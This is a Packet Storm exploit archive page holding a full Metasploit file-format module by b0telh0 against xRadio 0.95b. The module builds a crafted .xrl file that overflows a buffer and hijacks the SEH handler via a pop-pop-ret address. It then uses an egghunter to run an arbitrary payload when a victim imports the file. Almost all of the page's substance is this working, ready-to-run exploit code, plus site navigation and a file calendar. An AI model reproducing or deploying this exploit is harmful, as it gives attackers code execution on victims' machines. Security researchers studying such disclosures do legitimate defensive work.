exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

xRadio 0.95b Buffer Overflow

xRadio 0.95b Buffer Overflow
Posted Apr 19, 2012
Authored by b0telh0

This Metasploit module exploits a buffer overflow in xRadio 0.95b. Using the application to import a specially crafted xrl file, a buffer overflow occurs allowing arbitrary code execution.

tags | exploit, overflow, arbitrary, code execution
SHA-256 | 29818ef616f922a8dafe08d3b7fc05bbecd247b885f9977dbbbf05e4045d35b1

xRadio 0.95b Buffer Overflow

Change Mirror Download
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking

include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Remote::Seh
include Msf::Exploit::Remote::Egghunter

def initialize(info = {})
super(update_info(info,
'Name' => 'xRadio 0.95b Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in xRadio 0.95b.
Using the application to import a specially crafted xrl file,
a buffer overflow occurs allowing arbitrary code execution.
},
'License' => MSF_LICENSE,
'Author' =>
[
'b0telh0 <me[at]gotgeek.com.br>',
],
'References' =>
[
[ 'BID', '46290' ],
[ 'EDB', '16141' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'seh',
'DisablePayloadHandler' => 'true'
},
'Platform' => 'win',
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00\x0a\x0d",
'StackAdjustment' => -3500
},
'Targets' =>
[
[ 'Windows Universal',
{
# pop eax - pop ebx - ret xradio.exe
'Ret' => 0x0047E282
}
],
],
'Privileged' => false,
'DisclosureDate' => 'Feb 08 2011',
'DefaultTarget' => 0))

register_options(
[
OptString.new('FILENAME', [true, 'The file name.', 'msf.xrl'])
], self.class)

end

def exploit
eggoptions =
{
:checksum => true,
:eggtag => 'w00t'
}

hunter,egg = generate_egghunter(payload.encoded, eggoptions)

buffer = rand_text_alpha_upper(4066-egg.length)
buffer << egg
buffer << make_nops(10)
buffer << hunter
buffer << "\xeb\xd8\xff\xff" # nseh jmp back 40 bytes
buffer << [target.ret].pack('V') # seh

print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(buffer)
end

end
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close